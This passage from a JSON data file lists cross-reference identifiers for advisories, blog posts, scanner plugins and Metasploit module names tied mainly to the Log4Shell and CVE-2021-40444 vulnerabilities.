"B47B01CFCEE320F0AE033C32D22579706D0B59585EDEDF3D908CA06FA3E92084", "B5D3987D37FA57ECB44634029606786ADADCB0901EF9858232A7D33908EC5FD2", "B682A1DCF5A33AB9CBD3062B0DF0A131D5180AA2BBD201782B95DC8A2C33D1AA", "B73437073599A5973472D300EA14AD94DB00FCC9790D93795D0BCA840608CBF4", "B735C91C5D46BD88FD491D67AB17706F0B9FDF9D50797EB4994A198C09D7FD04", "B7376C4EB80B7D4936C0682206BD2DC0AD5969B181368D3EB95A8FBA366BDB63", "BAFF6760E68C0F676AFA3DA20E18B06BD703574BC65B9BFDBCD22ACCE05F7FEB", "BB76D9518CCBAE68500AB2DACF1AAAF9F5532441FD3A705A4E4A39114EEBDC0C", "BB785F5F4B456D5F3322E9222022F0E38411602612EBF72BC61AEEABF7FEC2A9", "BB96DF8C4863ECA5111B83DE1E5DBA4C67AC8E6999013404D8DD87C98CC7B60D", "BBA20026A90E4F85555F0C8BD6248AE07F7DE01D687CD62F0159CF4B22E7DA25", "BBB0C0E9DDF621A6AE6C42CB1DFF2B33670CE69032E5482B47DC24C860F78C9A", "BC3A1086428BA3DB72FFD49EA27AAB3A8A9FA0DD5D576D47E0467AE96C365754", "BD8AEC08AE2FA3C7B6CDD03A046DE8D2D846B9AC7A7C2948B791173D0622B3A4", "BE7DD314CD7039219534B2612D0FEFD382DCC5D154AD49257A517A91FA728423", "BFA9A84596ADAC3A47B31C43DD8574B1E532311E1F9B01F003F6AEFDDA4BAACF", "BFA9E5B9CD204137C5C40A62AFA0C09607B8FABF6ADAD16BDE69778F6E3530F1", "C04EDE0E9159DC9AE235755A284662F042D80745649864CE91E7E3E4563221F6", "C0CE38B8081A59A18598B204BF933579D5A04D57C0E8BBBEC053AC1350A2938C", "C1BEC46524F176FAE4CBB603AC283FC9F12029FC3579BBDE20A1B80FA597B0FC", "C3A579D5583598BF4F36F66A731C39A1C3E23351DFAFC16956E2C8DAB030AEBF", "C717E3C358B1EA0AC9E1701DBA722015744796BC3CBA66E7AD79D30CEB45BD60", "C741AA98787A9F837D93EA7D1268C62A551244CB826F0BEFDB076F796F78AB33", "C7FAA00C9C125584B8B9505CE7E7AC97AF7514904E37D2747A78CB0B5B0F3315", "C810746DF12642CDB3444A565C3CE3ABFEFAE31EFE9FE6BC4718CE76334BEB88", "CA111B4E9CA9EC240292C6D00FE0CF8C7559AC1453E3199BC3370D149FB11174", "CBB6711004455A0722EAF33EA7E16444AE4DF08D1F9C341B64251DB448ACCBB4", "CCF869217B83C7570F586028248E128FA170E16792CBF3BAD70423425B1BD638", "CD617F98180D24BACD7FAE3B791B49B329F7F25DC885A6AD81CD6A815194B6BA", "CDB95A8580AD247B239607B2769A506C10A81055AF8F4063AA0D26A850A33B58", "CDC93F5A32848FF0073C48EDC66593F2A0A2AACCAE9802E843826C6E565AE2E9", "CDF01D5D29ED4731048DA0F1A6FDE407B2DA246B226E3DF9945EBC838B4660A1", "CE6A6F0970C169F7DBE65AA5DFCFCEC0BEA99E837906D043FD4B6D3BF7A87D67", "CF56D9AEC134D68DA67A2476D2B87833F63F32777672C1C66A8D8FF69C08623B", "CFDD5A9C7B8C9F6AFEAF6B1C68FF8C11BEADF52EE2E731CBCD194CACB1898BD6", "D28370F3789940A6A2F0B48D0BB882F7E298E5B8C7167BC16F9FB06B92DBCF35", "D4AC8637482E0D53AE579FBD19E568DF643A9D732D1995CBEF53FC6B867F82DA", "D6A22AE665DEADE235C2738407D64638A424C6CC505B816BFEA12DEFCC5CD645", "D728283BFB4D0C3BC5C98FA880696DFC59C2A5FA652666E966D126A6D7FC92FA", "D78F8119FF4EBAA3EA6E8A906FCEFE0DB24B626AB87F3DFEBFA899904F726130", "D792D660667D934B582774E627CB3E2E010E497C8C1D9F4B7C138E4B5DC2ECEC", "D928C805B6C7AD1BA5D5DA1EB77352559E54787E379CD22474A13592C0B83C20", "D9D2F8F1F4727F09E77272D6C8643C3016BCD6A8E4BC6E59B27B37256F4F8F76", "DACB3E9783156FCD47517FD5E71AA5A2242EAA043F56F2EA75EC325BA052BDDD", "DC086AC7F5679D9F84A3DA8B91FAB9C0F09EF5EFB4C8687216156974F51B6283", "DCE05236BD35B28C109059A740CACEE5CE345130605BA9DEA39EFDA6BC532303", "DE8C5DCB7F07498942725CF8F7905DBA001C7B89D3D36370CC303A274CB9A8EB", "DF859649010EE2675B4BBF6D4BFAE7D654D24685054B3403A45C4270AD966550", "E036688C47591ADE56001D0CD1013191D6F43940CA2DB9509F5FCF0F2469F92A", "E0F75591E2E6874A35B6A6C7681543B81128F5226E803A2CCE1D1B664BFC8638", "E141221C1C63036AE1C76B976A04706F4495C39812FC722478A0C755043A0E14", "E1810AD4BA382A8D222D20A49D11C634E6C5240D3F69652E51FC068062DED465", "E2E1AB8B9E10CF0970D428552F10FD3FEA7D405315E7CCA6431E3F0E8079B159", "E36B23DB3CC2EC748DF333353AEDE5A1F8FAA97C1F1DC67E27CD4759E7D0C960", "E3C82809E8425A65E53029135451CC9579AA725E2D85009F892DD0A0FD979ED9", "E41278F69BC61D835FAC88FBCE06075D73C74B99B009DE680A92B2B68FE577DB", "E636319395E5D666C247860149142969762B284D3BE296819A5644E6AE6DDA15", "E679F241D5F455DCABCB653D142792B97352015B6DD79A1EB36DB0B4D54B2902", "E67F6EE1C05A0DFBB7E42F8DDE81795FCC3D933297C925E42690163F0C1D21A6", "E775C68CA18D51E91E688F1880BD5AF1955B5F4DF7397FA28CC721E37DAFB99A", "E7E10B1CFDE7DBAE5E93EB8EF50E03FCA4DAE3C0D9270B040B02BCEE5D0199B9", "E8302DECE1CECF16A05E7F8FBA08D33074F30279F18CDDBABA912B9C9DF9F32D", "E84CA6147175A22CB9253587142088EB24B6AE0BD11EC07E71E299F57DD05739", "E8825B71ACE31BFAA5662E2357C5EEB425BA842AC21E60C761364799BFD2FEE3", "EA69F3ACF81616FFD52E1EC0A74B074CC736B3675D7B61644018A9252D9BD284", "EACE8EC2B7164C19E5BA497C1D57887C847EC033403098801408B0F6BB2B6736", "EBDD1B77CC71D5E7D7E88D21F7F8C7988F44B743E7ABCFC5258E806235EC65A9", "ECC7277FA4D1E6C0C387927905899E353FF202FB061043E0FC8C0DBCF3150F7E", "ED7164C07048A48E59D18BAADA456D0655A81F29CABBDEFA06735647C2B759EA", "ED78D94545EF8A4A811D2C198EC427B8C46CA1FE3BBC9D6A2DC20DD440CB6FDC", "EDA30B3C2FB2766DFAA280B3B5E960EC660172EBFF7B73A524DCE514A3A3F985", "EF05485B7227E17E422CCBDF0EC02D62F554406DEDDDC7A1772D75D577035F79", "EF5F7BA296D0A7B4B6CC058D9B89B1BFEE714F79C2BC4541813DA99A292450B9", "EF71291A92B5250A0A03CC8B24766E487991713BE06BEFF3A0428155C170ECB7", "EFA06779A2DA162F7F70171BAC9D53E998DA486C75081458549AFE875DB6E5B5", "EFC94A6E1DA52C8EA7A5811D6A4381770FA24130DB4CFD911120046DD916261B", "EFD4687D2DC8ADFBEC960932263D6DA222DDFA92899BC72A9B9D62B4331178A6", "F0166F21D9D8651F7C71CAAA5131EEC4CE044F990491482A736F6DD767A3EC0F", "F0259373A53F6B73B3C7BD9A2F3F10DB053D9CC563866E61F5A496D33B416EA9", "F0806D2A2F2817DD3A11695DB658C0C7C64B134E8875822DCE8F5D73AC04E97B", "F16DAE77B5D6C7D782818596F851DFFB29226C0550922519EFC4250E27D09D67", "F18F021F8259C21D1B03D3A3C3F5FD97D6A165E424FE86F9986F545F5A914F8E", "F20E63C2D2D2AA05D977555688CD3131DF08DA240FDFCEB0B017DF8A789BCCEE", "F3EF1FC432D040B91FC6C5AEB324AF8CE32BCFB7A9A0360FC4722981B736F64F", "F435C74BF942E3B3A5FEF2B742E716E29826D42678DE6AB053B1766FC7314452", "F89923018671257EB76989AE7AB9D39396FBAD6F8846CB56D6915361F1CCCC48", "F8F03C35A3C8AEA5027E6C01D991D7E1C3A4A0C9EAE0D875ACF760D1D56B8B9C", "F9CD245944BE763583F94B01BC23C08D6F82CA4989F000C1D0842D4005C4EF11", "FA8CCED2D5B77B978F428FA2F61CD879A13EF9DAC53A5435AC48BEE003AC2363", "FC9172D16F62D7749E6C1369AB9D86ABC42163C780B457F765109BE80ACAD9CF", "FD7B4551E68C6A5B21AD8C3E07FF7CB6ED5402B6F6CD6D419A3FCC60FFB43FC4", "FD90B8CB0F60381B89DB489D4F28883B2B08D5BF67796B29DF21E510CCF7594F", "FEC06635C46DD9EB6B2F50E66A9B098564986FB86BF7FDE8DBF9F7E295CE3162", "FFB1DE47049D302B3C804FCFC90E8D4C1A715F59A9B241F24946D4A7A6598C10", "FFB480E3AA8E74E184658371B22D113F0FB890C232EB9EE9B8A8294BE098DDAE", "FFF0238333AAC9C302B602B36ADA76C6BDDE2A493106B114D0A3A45C8740777D"]}, {"type": "ics", "idList": ["ICSA-21-357-02", "ICSA-22-034-01"]}, {"type": "impervablog", "idList": ["IMPERVABLOG:357497C932E21C66FB08D2C9B8EE9CA2", "IMPERVABLOG:5E03360E0443A626205E9BCF969114F6", "IMPERVABLOG:7CB37AC69862942C5D316E69A7815579", "IMPERVABLOG:B4C9A56D0F82346F616E74B1CFB10A5D", "IMPERVABLOG:B69DFFED5C2E2C9D2F9917E3F4915200", "IMPERVABLOG:BB63986B2DE2CCB2C65DD3747791097F", "IMPERVABLOG:BE9CCB7ADF74E2AEFC999FEE704CDE71", "IMPERVABLOG:BEE8EB9D446D0AF62464EE59DFA0CE0E", "IMPERVABLOG:DB0BBA5A6E2E523FAA7F7A73C45FEA96"]}, {"type": "intel", "idList": ["INTEL:INTEL-SA-00646"]}, {"type": "kaspersky", "idList": ["KLA12277", "KLA12278", "KLA12390", "KLA12392", "KLA12393", "KLA12395", "KLA12396", "KLA12442"]}, {"type": "kitploit", "idList": ["KITPLOIT:1207079539580982634", "KITPLOIT:134021490040098714", "KITPLOIT:144331229809700743", "KITPLOIT:1624142243530526923", "KITPLOIT:1680589374755422772", "KITPLOIT:2590785192528609562", "KITPLOIT:3188944951765917430", "KITPLOIT:3456474172768099634", "KITPLOIT:3697667464193804316", "KITPLOIT:3773942873037113539", "KITPLOIT:4033244480100620751", "KITPLOIT:4074521293617632933", "KITPLOIT:4125185526326677098", "KITPLOIT:4333067961180534072", "KITPLOIT:4462385753504235463", "KITPLOIT:4654779182065061303", "KITPLOIT:5104415481503400470", "KITPLOIT:5187040326820919368", "KITPLOIT:522409803487164759", "KITPLOIT:5230148353750207837", "KITPLOIT:5734436811250397170", "KITPLOIT:5789499291738758939", "KITPLOIT:6422486000446318290", "KITPLOIT:6759391622067035795", "KITPLOIT:698315176468431184", "KITPLOIT:7847586937102427883", "KITPLOIT:7976092996345827446", "KITPLOIT:8031680161397698025", "KITPLOIT:8148701901300660800", "KITPLOIT:8266451932034361580", "KITPLOIT:8945091038325456871", "KITPLOIT:942518396640901655"]}, {"type": "krebs", "idList": ["KREBS:2EC42B845847A6DCFE50ECEB9FF61C29", "KREBS:409088FC2DFC219B74043104C2B672CC"]}, {"type": "mageia", "idList": ["MGASA-2021-0556", "MGASA-2021-0566"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:1B8D17909172F80C0F82CB21FDFC33B2", "MALWAREBYTES:39A05D4A4EC81966F7A1721DFACB3470", "MALWAREBYTES:4CB01833826116B2823401DFB69A5431", "MALWAREBYTES:76333D1F0FCAFD79FA2EDD4A4CAFBB38", "MALWAREBYTES:801E20618F96EF51F9E60F7BC7906C2B", "MALWAREBYTES:A325F8FB1D527BD3C6C1C3A187840632", "MALWAREBYTES:B8C767042833344389F6158273089954", "MALWAREBYTES:DB54B348AF1AC41987150B5CE7B1BC66", "MALWAREBYTES:F1563A57212EB7AEC347075E94FF1605", "MALWAREBYTES:FC8647475CCD473D01B5C0257286E101"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY-SCANNER-HTTP-LOG4SHELL_SCANNER-", "MSF:EXPLOIT-MULTI-HTTP-LOG4SHELL_HEADER_INJECTION-", "MSF:EXPLOIT-MULTI-HTTP-VMWARE_VCENTER_LOG4SHELL-", "MSF:EXPLOIT-WINDOWS-FILEFORMAT-WORD_MSHTML_RCE-"]}, {"type": "mmpc", "idList": ["MMPC:27EEFD67E5E7E712750B1472E15C5A0B", "MMPC:42ECD98DCF925DC4063DE66F75FB5433", "MMPC:795E0A765679492C51FEFA2B19EAD597", "MMPC:BB2F5840056D55375C4A19D2FF07C695"]}, {"type": "mscve", "idList": ["MS:CVE-2021-40444", "MS:CVE-2021-44228"]}, {"type": "mskb", "idList": ["KB5005563"]}, {"type": "msrc", "idList": ["MSRC:543F3A129A47F4B14FB170389908717B"]}, {"type": "mssecure", "idList": ["MSSECURE:27EEFD67E5E7E712750B1472E15C5A0B", "MSSECURE:42ECD98DCF925DC4063DE66F75FB5433", "MSSECURE:795E0A765679492C51FEFA2B19EAD597", "MSSECURE:BB2F5840056D55375C4A19D2FF07C695"]}, {"type": "nessus", "idList": ["AL2_ALAS-2021-001.NASL", "AL2_ALAS-2021-1730.NASL", "AL2_ALAS-2021-1731.NASL", "AL2_ALAS-2021-1732.NASL", "AL2_ALAS-2022-1773.NASL", "AL2_ALAS-2022-1806.NASL", "AL2_ALASCORRETTO8-2021-001.NASL", "AL2_ALASJAVA-OPENJDK11-2021-001.NASL", "ALA_ALAS-2021-1553.NASL", "ALA_ALAS-2021-1554.NASL", "ALA_ALAS-2022-1562.NASL", "ALA_ALAS-2022-1580.NASL", "ALA_ALAS-2022-1601.NASL", "ALMA_LINUX_ALSA-2022-0290.NASL", "APACHE_APEREO_CAS_LOG4SHELL.NBIN", "APACHE_DRUID_LOG4SHELL.NBIN", "APACHE_JSPWIKI_LOG4SHELL.NBIN", "APACHE_LOG4J_2_15_0.NASL", "APACHE_LOG4J_2_16_0.NASL", "APACHE_LOG4J_JDNI_LDAP_GENERIC.NBIN", "APACHE_LOG4J_JDNI_LDAP_GENERIC_HTTP_HEADERS.NBIN", "APACHE_LOG4J_JDNI_LDAP_GENERIC_TELNET.NBIN", "APACHE_LOG4J_JNDI_LDAP_GENERIC_RAW.NBIN", "APACHE_LOG4J_WIN_2_15_0.NASL", "APACHE_LOG4SHELL_DNS.NBIN", "APACHE_LOG4SHELL_IMAP.NBIN", "APACHE_LOG4SHELL_MSRPC.NBIN", "APACHE_LOG4SHELL_NETBIOS.NBIN", "APACHE_LOG4SHELL_POP3.NBIN", "APACHE_LOG4SHELL_SMTP.NBIN", "APACHE_LOG4SHELL_SNMP.NBIN", "APACHE_LOG4SHELL_SSH.NBIN", "APACHE_LOG4SHELL_UPNP.NBIN", "APACHE_OFBIZ_LOG4SHELL.NBIN", "APACHE_SOLR_LOG4SHELL.NBIN", "CISCO-SA-APACHE-LOG4J-QRUKNEBD-CUIC.NASL", "CISCO-SA-APACHE-LOG4J-QRUKNEBD-ISE.NASL", "CISCO-SA-APACHE-LOG4J-QRUKNEBD-SDWAN-VMANAGE.NASL", "CISCO-SA-APACHE-LOG4J-QRUKNEBD-UCS-DIRECTOR.NASL", "DEBIAN_DLA-2842.NASL", "DEBIAN_DLA-2905.NASL", "DEBIAN_DSA-5020.NASL", "DEBIAN_DSA-5022.NASL", "EULEROS_SA-2022-1276.NASL", "FREEBSD_PKG_1EA05BB85D7411ECBB1E001517A2E1A4.NASL", "FREEBSD_PKG_3FADD7E4F8FB45A0A2188FD6423C338F.NASL", "FREEBSD_PKG_4B1AC5A35BD411EC8602589CFC007716.NASL", "FREEBSD_PKG_515DF85A5CD711ECA16D001517A2E1A4.NASL", "FREEBSD_PKG_650734B2766541709A0AEECED5E10A5E.NASL", "FREEBSD_PKG_93A1C9A75BEF11ECA47A001517A2E1A4.NASL", "FREEBSD_PKG_B0F49CB9673611EC9EEA589CFC007716.NASL", "LOG4J_LOG4SHELL_FTP.NBIN", "LOG4J_LOG4SHELL_NTP.NBIN", "LOG4J_LOG4SHELL_PPTP.NBIN", "LOG4J_LOG4SHELL_RPCBIND.NBIN", "LOG4J_LOG4SHELL_SIP_INVITE.NBIN", "LOG4J_LOG4SHELL_SMB.NBIN", "LOG4J_LOG4SHELL_WWW.NBIN", "LOG4J_VULNERABLE_ECOSYSTEM_LAUNCHER.NASL", "MACOS_SPLUNK_824.NASL", "MOBILEIRON_LOG4SHELL.NBIN", "OPENSUSE-2021-1577.NASL", "OPENSUSE-2021-1586.NASL", "OPENSUSE-2021-1601.NASL", "OPENSUSE-2021-1612.NASL", "OPENSUSE-2021-1613.NASL", "OPENSUSE-2021-1631.NASL", "OPENSUSE-2021-3999.NASL", "OPENSUSE-2021-4094.NASL", "OPENSUSE-2021-4107.NASL", "OPENSUSE-2021-4109.NASL", "OPENSUSE-2021-4111.NASL", "OPENSUSE-2021-4112.NASL", "OPENSUSE-2022-0038-1.NASL", "ORACLELINUX_ELSA-2021-5206.NASL", "ORACLELINUX_ELSA-2022-0290.NASL", "ORACLELINUX_ELSA-2022-9056.NASL", "ORACLE_PRIMAVERA_GATEWAY_CPU_JAN_2022.NASL", "ORACLE_PRIMAVERA_P6_EPPM_CPU_JAN_2022.NASL", "PALO_ALTO_LOG4SHELL.NASL", "REDHAT-RHSA-2022-1296.NASL", "REDHAT-RHSA-2022-1297.NASL", "SMB_NT_MS21_IE_SEPT_2021.NASL", "SMB_NT_MS21_SEP_5005565.NASL", "SMB_NT_MS21_SEP_5005566.NASL", "SMB_NT_MS21_SEP_5005568.NASL", "SMB_NT_MS21_SEP_5005569.NASL", "SMB_NT_MS21_SEP_5005573.NASL", "SMB_NT_MS21_SEP_5005613.NASL", "SMB_NT_MS21_SEP_INTERNET_EXPLORER.NASL", "SPLUNK_824.NASL", "SUSE_SU-2021-14866-1.NASL", "SUSE_SU-2021-4111-1.NASL", "SUSE_SU-2021-4112-1.NASL", "SUSE_SU-2021-4115-1.NASL", "UBIQUITI_UNIFI_NETWORK_LOG4SHELL.NBIN", "UBUNTU_USN-5192-1.NASL", "UBUNTU_USN-5192-2.NASL", "UBUNTU_USN-5197-1.NASL", "UBUNTU_USN-5223-1.NASL", "VMWARE_HORIZON_LOG4SHELL.NBIN", "VMWARE_VCENTER_LOG4SHELL.NBIN", "VMWARE_VREALIZE_OPERATIONS_MANAGER_LOG4SHELL.NBIN", "WEB_APPLICATION_SCANNING_113075"]}, {"type": "nvidia", "idList": ["NVIDIA:5294", "NVIDIA:5295"]}, {"type": "oracle", "idList": ["ORACLE:CPUJAN2022"]}, {"type": "osv", "idList": ["OSV:DLA-2842-1", "OSV:DSA-5020-1", "OSV:DSA-5022-1", "OSV:GHSA-3QPM-H9CH-PX3C", "OSV:GHSA-7RJR-3Q55-VV33", "OSV:GHSA-FP5R-V3W9-4333", "OSV:GHSA-J3CH-VJPH-8Q6V", "OSV:GHSA-J7C3-96RF-JRRP", "OSV:GHSA-JFH8-C2JP-5V3Q", "OSV:GHSA-MF4F-J588-5XM8", "OSV:GHSA-V57X-GXFJ-484Q"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:165214", "PACKETSTORM:165261", "PACKETSTORM:165270", "PACKETSTORM:165532", "PACKETSTORM:165642", "PACKETSTORM:165673", "PACKETSTORM:167317", "PACKETSTORM:167917"]}, {"type": "paloalto", "idList": ["PA-CVE-2021-44228"]}, {"type": "pentestpartners", "idList": ["PENTESTPARTNERS:E6B48FF79C5D0D1E4DD360F6010F2A93"]}, {"type": "qt", "idList": ["QT:7EFAEDCED59EA2EE3AB98A0A484C5825"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:0082A77BD8EFFF48B406D107FEFD0DD3", "QUALYSBLOG:13C1A00A7D0A7B1BB16D0AB5B1E9B51A", "QUALYSBLOG:15D6ABF4D9A50D86E63BA4553A0CD3C6", "QUALYSBLOG:33FD0B08A1B2E414EAA2ADDFCDFE0EB1", "QUALYSBLOG:3F1898282AF38991E0B849D7A68D2A2B", "QUALYSBLOG:3FADA4B80DBBF178154C0729CFC1358F", "QUALYSBLOG:42335884011D582222F08AEF81D70B94", "QUALYSBLOG:5059D1C3913FB6542F3283A66F9B3A43", "QUALYSBLOG:5576D16DC39617927D8AEFF027CC0911", "QUALYSBLOG:68BBBF644900DA0A883AABB0E4E3F28B", "QUALYSBLOG:6C71B912ABF74BE51F014EC90669CF30", "QUALYSBLOG:BC22CE22A3E70823D5F0E944CBD5CE4A", "QUALYSBLOG:C2ECE416E32C6CC230B13471D41A4E03", "QUALYSBLOG:C3C14B989683A02C2C9A98CE918FBC3C", "QUALYSBLOG:CAF5B766E6B0E6C1A5ADF56D442E7BB2"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:02EDDA927928C11A6D10A4A0D17823AF", "RAPID7BLOG:0576BE6110654A3F9BF7B9DE1118A10A", "RAPID7BLOG:078D5EE222682A75AE1A1A3A3684E38D", "RAPID7BLOG:0C5C51ED53983B92C7C9805E820366C9", "RAPID7BLOG:18CF89AA3B9772E6A572177134F45F3A", "RAPID7BLOG:18D49792276E208F17E7D64BCE2FDEF6", "RAPID7BLOG:1D39E7BBA13704DCBB8153C89ABE6B72", "RAPID7BLOG:24E0BE5176F6D3963E1824AD4A55019E", "RAPID7BLOG:2FC92FBE5A4445611C80C7C3FA7D9354", "RAPID7BLOG:2FFDE45F01FA44216BE91DD7AFA0D060", "RAPID7BLOG:45B045D2EE21432DF9939E4402522BFC", "RAPID7BLOG:4CDB288231FA4BF52C0067D9D4FEABBF", "RAPID7BLOG:602109CBDD808C41E4DDC9FBC55E144D", "RAPID7BLOG:6EADCD983283E3D546EF2907978E95F1", "RAPID7BLOG:7767347A5784FF1C4901601A1A21D2C8", "RAPID7BLOG:7F1312E79E0925118565C90443170051", "RAPID7BLOG:97E3CA7ED938F3DF6E967C832F314FA3", "RAPID7BLOG:9CB105938BDE92F573A2DE68BC20CF46", "RAPID7BLOG:AB5C0BC130F45073226CC41D25680EA0", "RAPID7BLOG:AE824D3989C792700A622C455D8EE160", "RAPID7BLOG:AF9E6199C63A57B22FAE6AAEDD650D39", "RAPID7BLOG:B6DE24165AA9AA83EDA117170EDDAD44", "RAPID7BLOG:BE60EE9A1ACB3CEE4593041ECAFA8D95", "RAPID7BLOG:C6C1B8357ABD28AEB0F423A0A099098A", "RAPID7BLOG:CB62092B4C7E70876CF276BA04DD7597", "RAPID7BLOG:CC071AA6971D64B0F7A596B2BBD5F046", "RAPID7BLOG:D185BF677E20E357AFE422CFB80809A5", "RAPID7BLOG:D1E1A150733F5AFC2C704DB26E7EAB30", "RAPID7BLOG:E3D08ECAA9A93569D5544F4D6AAEEB74", "RAPID7BLOG:E43819A7DE1DD0F60E63E67A27B9301B", "RAPID7BLOG:ED80467D2D29D8DC10E754C9EA19D9AD", "RAPID7BLOG:F14526C6852230A4E4CF44ADE151DF49", "RAPID7BLOG:F14E17E573386DB3DDD27A8E829E49A1", "RAPID7BLOG:F37BD0C67170721734A26D15E6D99B3E", "RAPID7BLOG:F76EF7D6AB9EB07FC8B8BCE442DC3A69", "RAPID7BLOG:F9B4F18ABE4C32CD54C3878DD17A8630", "RAPID7BLOG:FB97B7B381BE98BE0077666DFDEC1953", "RAPID7BLOG:FBEE52CB3C438E4C42D6212E07BEFEA9"]}, {"type": "redhat", "idList": ["RHSA-2021:5093", "RHSA-2021:5094", "RHSA-2021:5106", "RHSA-2021:5107", "RHSA-2021:5108", "RHSA-2021:5126", "RHSA-2021:5127", "RHSA-2021:5128", "RHSA-2021:5129", "RHSA-2021:5130", "RHSA-2021:5132", "RHSA-2021:5133", "RHSA-2021:5134", "RHSA-2021:5137", "RHSA-2021:5138", "RHSA-2021:5140", "RHSA-2021:5141", "RHSA-2021:5148", "RHSA-2021:5183", "RHSA-2021:5184", "RHSA-2021:5186", "RHSA-2022:0082", "RHSA-2022:0083", "RHSA-2022:0203", "RHSA-2022:0205", "RHSA-2022:0216", "RHSA-2022:0222", "RHSA-2022:0223", "RHSA-2022:0296", "RHSA-2022:1296", "RHSA-2022:1297", "RHSA-2022:1299"]}, {"type": "redhatcve", "idList": ["RH:CVE-2021-4104", "RH:CVE-2021-4125", "RH:CVE-2021-44228", "RH:CVE-2021-44832", "RH:CVE-2021-45046", "RH:CVE-2021-45105"]}, {"type": "securelist", "idList": ["SECURELIST:11665FFD7075FB9D59316195101DE894", "SECURELIST:29152837444B2A7E5A9B9FCB107DAB36", "SECURELIST:52D1B0F6F56EE960CC02B969556539D6", "SECURELIST:63306FA6D056BD9A04969409AC790D84", "SECURELIST:7A375F44156FACA25A0B3990F2CD73C1", "SECURELIST:86368EF0EA7DAA3D2AB20E0597A62656", "SECURELIST:9CC623A02615C07A9CEABD0C58DE7931", "SECURELIST:C540EBB7FD8B7FB9E54E119E88DB5C48", "SECURELIST:E21F9D6D3E5AFD65C99FC385D4B5F1DC"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2021:1577-1", "OPENSUSE-SU-2021:1586-1", "OPENSUSE-SU-2021:1601-1", "OPENSUSE-SU-2021:1613-1", "OPENSUSE-SU-2021:3999-1", "OPENSUSE-SU-2021:4094-1", "OPENSUSE-SU-2021:4107-1", "OPENSUSE-SU-2021:4109-1"]}, {"type": "symantec", "idList": ["SMNTC-19793"]}, {"type": "talosblog", "idList": ["TALOSBLOG:0AA83DE1427426ABF4723FDF049F6EEB"]}, {"type": "thn", "idList": ["THN:1D10167F5D53B2791D676CF56488D5D9", "THN:2656971C06C4E3D4B0A8C0AC02BBB775", "THN:365025B2416483B34C70F02EDA44131E", "THN:368B6517F020AB4BF1B2344EDC8234A4", "THN:4DE731C9D113C3993C96A773C079023F", "THN:4E80D9371FAC9B29044F9D8F732A3AD5", "THN:59AE75C78D4644BFA6AD90225B3DE0C1", "THN:5BAE3325983F971D1108722C454FF9AB", "THN:5CB7AEBFFE369D293598A4FDBFDFCEE3", "THN:602D65D576B090BAC4B0C96998F8F922", "THN:668DE2C9CFD709125451AF8F3FE12E6C", "THN:67ECC712AB360F5A56F2434CDBF6B51F", "THN:686DDFA07B415C41BA7AB9B8970557EF", "THN:76D7572EDBE770410D6F0518DAD8B0AD", "THN:7958F9B1AA180122992C6A0FADB03536", "THN:833B2B9623F1C64D20868B947E8BE4E0", "THN:83D31EE6B3E59778D812B3B7E67D7CD6", "THN:8A60310AB796B7372A105B7C8811306B", "THN:933FE23273AB5250B949633A337D44E1", "THN:959FD46A8D71CA9DDAEDD6516113CE3E", "THN:AFF2BD38CB9578D0F4CA96A145933627", "THN:BD014635C5F702379060A20290985162", "THN:C4188C7A44467E425407D33067C14094", "THN:C73B84809CDC20C90C26FF1B7F56F5D4", "THN:D4E86BD8938D3B2E15104CA4922A51F8", "THN:E27BF56DBA34B1A89BD29AEB5A6D8405", "THN:E7762183A6F7B3DDB942D3F1F99748F6", "THN:E7E8D45492BAD83E88C89D34F8502485", "THN:ECDABD8FB1E94F5D8AFD13E4C1CB5840"]}, {"type": "threatpost", "idList": ["THREATPOST:02A472487653A461080415A3F7BB23D2", "THREATPOST:03FC9E97BBF9730C5990E8A220DD5E9A", "THREATPOST:065F7608AC06475E765018E97F14998D", "THREATPOST:075BA69792AA7B1AE4C28E1CBE61E360", "THREATPOST:08E51C6FB9418179611DF2ACFB1073BF", "THREATPOST:09118C676E28AC5D7BB791E76F75453C", "THREATPOST:0B290DDF3FE14178760FDC2229CB1383", "THREATPOST:0C3BAA4DB9E2B5E8A30DD20A987FCE03", "THREATPOST:0FD7F2FA7F2D3383F582553124EA843D", "THREATPOST:10245D9804511A09607265485D240FFF", "THREATPOST:10D0F1DDDD6C211DA3CE6395900B7C54", "THREATPOST:1309DBA0F8A2727965C6FA284A002D3B", "THREATPOST:138507F793D8399AF0EE1640C46A9698", "THREATPOST:138F67583DAC26A61D1AB90A018F1250", "THREATPOST:13D4AE4C03A3BF687491FDA1E8D732C7", "THREATPOST:14D52B358840B9265FED987287C1E26E", "THREATPOST:16624FA0DF55AAB9FDB3C14AC91EC9F5", "THREATPOST:16877B149E701CC4DB69E91C567D79CC", "THREATPOST:187B01687ED5D3975CD6E42E84DD9B13", "THREATPOST:19BDD881931703B28F7B93492E0C75FD", "THREATPOST:1A553B57472BB0EB8D69F573B510FDE6", "THREATPOST:1B42481449E86FEA3940A2E1E2634309", "THREATPOST:1BE6320CDA6342E72A5A2DD5E0758735", "THREATPOST:1CC682A86B6D521AD5E357B9DB3A1DFB", "THREATPOST:1EB961A6936CB97E2DE6C0212349367F", "THREATPOST:1F99A9A6A418194B87E5468CC8344FBF", "THREATPOST:20F9B8CE2D092108C0F78EC3E415F6B4", "THREATPOST:2188E3E33D86C2C3DF35253A3ED7FA6C", "THREATPOST:2246F7085606B44A031DC14D1B54B9DB", "THREATPOST:23B6C10D7EF469BE8ED27D1C9AFB526A", "THREATPOST:2707644CA0FB49ADD0ECA1B9AFDA0E8A", "THREATPOST:27C5AA551B5793DEA8848FB76DE52B32", "THREATPOST:280ACEC9B5A634E74F3C321F272C3EF3", "THREATPOST:2C0E12580D3C2F1CE7880F6955D4AA1E", "THREATPOST:305513A61FA2B0EF500854C82DF34A9C", "THREATPOST:31091088EDBCEEF43F75A2BA2387EB5C", "THREATPOST:31D14CEE5977BF71F79F7C30AEC10698", "THREATPOST:34D98758A035C36FED68DDD940415845", "THREATPOST:3697F9293A6DFF6CD5927E9E68FF488A", "THREATPOST:38E044431D55F0A4BC458FF92EB025BF", "THREATPOST:38E8D69F26ADB15A989532924B2A98C4", "THREATPOST:3A1C8593C0AAEFA3AF77D1A207BD0B65", "THREATPOST:3A5F59D56E40560C393A3F69A362A31B", "THREATPOST:3ADFDD3CC93B03F83C2CEC5583B016AB", "THREATPOST:3B06E49AA3C9F001C97038682A9BF73F", "THREATPOST:3B8B02F621E9D9883A541B1B26BDF410", 